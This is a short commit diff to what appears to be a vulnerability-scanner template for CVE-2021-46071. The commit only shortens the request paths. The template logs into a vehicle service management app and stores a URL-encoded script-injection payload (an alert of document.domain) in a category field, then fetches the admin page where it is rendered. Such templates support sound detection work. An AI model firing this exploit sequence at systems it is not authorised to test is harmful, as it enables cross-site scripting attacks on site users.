Update CVE-2021-46071.yaml

2022-09-01 19:34:59 +05:30 · 2022-09-01 19:34:59 +05:30 · 420c128dcb
parent c4c77f725a
commit 420c128dcb
1 changed files with 3 additions and 3 deletions
--- a/cves/2021/CVE-2021-46071.yaml
+++ b/cves/2021/CVE-2021-46071.yaml
@ -20,21 +20,21 @@ info:
 requests:
  - raw:
      - |
-        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        POST /classes/Login.php?f=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{username}}&password={{password}}

      - |
-        POST /vehicle_service/classes/Master.php?f=save_category HTTP/1.1
+        POST /classes/Master.php?f=save_category HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1

      - |
-        GET /vehicle_service/admin/?page=maintenance/category HTTP/1.1
+        GET /admin/?page=maintenance/category HTTP/1.1
        Host: {{Hostname}}

    req-condition: true